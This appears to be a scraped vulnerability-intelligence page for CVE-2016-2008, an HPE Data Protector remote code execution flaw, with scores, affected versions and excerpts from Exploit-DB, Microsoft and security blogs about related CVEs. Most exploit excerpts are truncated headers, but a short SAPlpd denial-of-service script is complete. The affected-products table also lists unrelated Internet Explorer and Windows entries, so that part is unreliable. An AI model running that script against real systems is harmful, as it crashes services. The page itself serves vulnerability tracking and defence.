CVE-2016-2008
published 2016-04-21CVE-2016-2008: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allows remote attackers to execute arbitrary code via unspecified vectors.
PriorityP263critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EPSS
10.48%
95.2th percentile
HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allows remote attackers to execute arbitrary code via unspecified vectors.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | data_protector | >= 7.0 < 7.03_108 | 7.03_108 |
| hp | data_protector | >= 8.0 < 8.15 | 8.15 |
| hp | data_protector | >= 9.0 < 9.06 | 9.06 |
| msrc | internet_explorer_10 | — | — |
| msrc | internet_explorer_11 | — | — |
| msrc | internet_explorer_11_on_windows_10_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_for_x64-based_systems | — | — |
| msrc | internet_explorer_9 | — | — |
| msrc | windows_7 | — | — |
| msrc | windows_server_2008 | — | — |
| msrc | windows_server_2008_r2 | — | — |
| msrc | windows_vista_service_pack_2 | — | — |
| msrc | windows_vista_x64_edition_service_pack_2 | — | — |
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_msrc8.8HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mcp8-rx22-p3vj: HPE Data Protector before 7
ghsa_unreviewed·2022-05-14
CVE-2016-2008 [CRITICAL] GHSA-mcp8-rx22-p3vj: HPE Data Protector before 7
HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allows remote attackers to execute arbitrary code via unspecified vectors.
Microsoft
Internet Explorer Security Feature Bypass Vulnerability
vendor_msrc·2016-05-10·CVSS 8.8
CVE-2016-0188 [HIGH] Internet Explorer Security Feature Bypass Vulnerability
Internet Explorer Security Feature Bypass Vulnerability
Description: A security feature bypass vulnerability exists when Internet Explorer fails to validate User Mode Code Integrity (UMCI) policies. The vulnerability could allow an attacker to bypass Device Guard UMCI policies.
To exploit the vulnerability, a user could either visit a malicious website or an attacker with access to the system could run a specially crafted application. An attacker could then leverage the vulnerability to run unsigned malicious code as though it were signed by a trusted source.
The update addresses the vulnerability by correcting how Internet Explorer validates UMCI policies.
FAQ: I am running Internet Explorer on Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, or Windows Server 2012 R2.
No detection rules found.
Exploit-DB
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
exploitdb·2017-07-11
CVE-2017-0144 Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
---
#!/usr/bin/python
from impacket import smb, smbconnection
from mysmb import MYSMB
from struct import pack, unpack, unpack_from
import sys
import socket
import time
'''
MS17-010 exploit for Windows 2000 and later by sleepya
EDB Note: mysmb.py can be found here ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42315.py
Note:
- The exploit should never crash a target (chance should be nearly 0%)
- The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1
Exploit-DB
SapLPD 7.40 - Denial of Service
exploitdb·2016-12-28
CVE-2016-10079 SapLPD 7.40 - Denial of Service
SapLPD 7.40 - Denial of Service
---
# Exploit Title: SAPlpd 7.40 Denial of Service
# Date: 2016-12-28
# Exploit Author: Peter Baris
# Exploit code: http://saptech-erp.com.au/resources/saplpd_dos.zip
# Version: 7.40 all patch levels (as a part of SAPGui 7.40)
# Tested on: Windows Server 2008 R2 x64, Windows 7 Pro x64
import socket
# Opcodes 03h and 04h are vulnerable to bad characters 00h and 0ah
# So you can modify the DoS accordingly
# The added 800 A's are just to show, that you can deliver a complete shell with the command
DoS = ("\x03"+"\x0a"+"\x41"*800)
s = socket.socket()
s.settimeout(1)
s.connect(('192.168.198.132', 515))
print("[*] Crashing SAPlpd 7.40")
print("[*] Payload length: "+str(len(DoS))+" bytes")
s.send(DoS)
s.close()
Exploit-DB
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)
exploitdb·2016-07-13
CVE-2016-0099 Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032) (Metasploit)
Microsoft Windows 7 'MS16-032 Secondary Logon Handle Privilege Escalation',
'Description' => %q{
This module exploits the lack of sanitization of standard handles in Windows' Secondary
Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12
32 and 64 bit. This module will only work against those versions of Windows with
Powershell 2.0 or later and systems with two or more CPU cores.
},
'License' => BSD_LICENSE,
'Author' =>
[
'James Forshaw', # twitter.com/tiraniddo
'b33f', # @FuzzySec, http://www.fuzzysecurity.com'
'khr0x40sh'
],
'References' =>
[
[ 'MS', 'MS16-032'],
[ 'CVE', '2016-0099'],
[ 'URL', 'https://twitter.com/FuzzySec/status/723254004042612736' ],
[ 'URL', 'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html']
]
Exploit-DB
HP Data Protector A.09.00 - Arbitrary Command Execution
exploitdb·2016-05-26·CVSS 9.8
CVE-2016-2004 [CRITICAL] HP Data Protector A.09.00 - Arbitrary Command Execution
HP Data Protector A.09.00 - Arbitrary Command Execution
---
#!/usr/bin/python
#
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
# This proof of concept demonstrates that enabling encrypted control communication on
# Data Protector agents does not provide any additional security.
# As is provides no authentication it is not a viable workaround to prevent the
# exploitation of well known Data Protector issues such as cve-2014-2623
#
# This exploit establishes and unauthenticated encrypted communication channel to
# a Data Protector Agent and
Unit42
Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
blogs_unit42·2020-07-21·CVSS 10.0
CVE-2020-1350 [CRITICAL] Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
## Executive Summary
In July 2020, Microsoft released a security update, CVE-2020-1350 | Windows DNS Server Remote Code Execution Vulnerability, for a new remote code execution (RCE) vulnerability.
This vulnerability exists within the Microsoft Windows Domain Name System (DNS) Server due to the improper handling of certain types of requests, specifically over port 53/TCP. Exploitation of this vulnerability is possible by creating an integer overflow, potentially leading to remote code execution.
This vulnerability only affects Windows DNS and the following builds of the Microsoft Windows operating system (OS):
- Windows Server 2008/2008 R2
- Windows Server 2012/2012 R2
- Windows Server 2016
- Windows Server 2019
- Windows Server version 1803/1903/1909/2004 (Server Core installation)
#
Qualys
July Patch Tuesday: 19 Critical Vulnerabilities from Microsoft, plus Critical Adobe Patches
blogs_qualys·2017-07-11·CVSS 7.8
CVE-2017-8589 [HIGH] July Patch Tuesday: 19 Critical Vulnerabilities from Microsoft, plus Critical Adobe Patches
Today Microsoft released patches covering 54 vulnerabilities as part of July’s Patch Tuesday update, with 26 of them affecting Windows. Patches covering 19 of these vulnerabilities are labeled as Critical, all of which can result in Remote Code execution. According to Microsoft, none of these vulnerabilities are currently being exploited in the wild.
Top priority for patching should go to CVE-2017-8589 , which is a vulnerability in the Windows Search service. This vulnerability can be exploited remotely via SMB to take complete control of a system, and can impact both servers and workstations. The issue affects Windows Server 2016, 2012, 2008 R2, 2008 as well as desktop systems like Windows 10, 7 and 8.1. While this vulnerability can leverage SMB as an attack vector, this is not a vulnera
Fortinet
iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
blogs_fortinet·2017-03-23·CVSS 8.1
CVE-2017-0104 [HIGH] iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
FORTIGUARD LABS THREAT RESEARCH
iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
By Honggang Ren | March 23, 2017
Summary
In November 2016, as part of my FortiGuard research work, I discovered and reported on an iSNS server memory corruption vulnerability in Microsoft Windows Server. On patch Tuesday of March 2017, Microsoft released the Security Bulletin MS17-012 that contain the fix for this vulnerability and identifies it as CVE-2017-0104.
This vulnerability could lead to remote code execution, and is rated as critical by Microsoft. The vulnerability affects Windows Server 2008, 2012, and 2016 versions. Microsoft recommends installing this update immediately.
In this blog I will share the details of this vulnerability.
How to Reproduce
To reproduce the vulne
2016-04-21
Published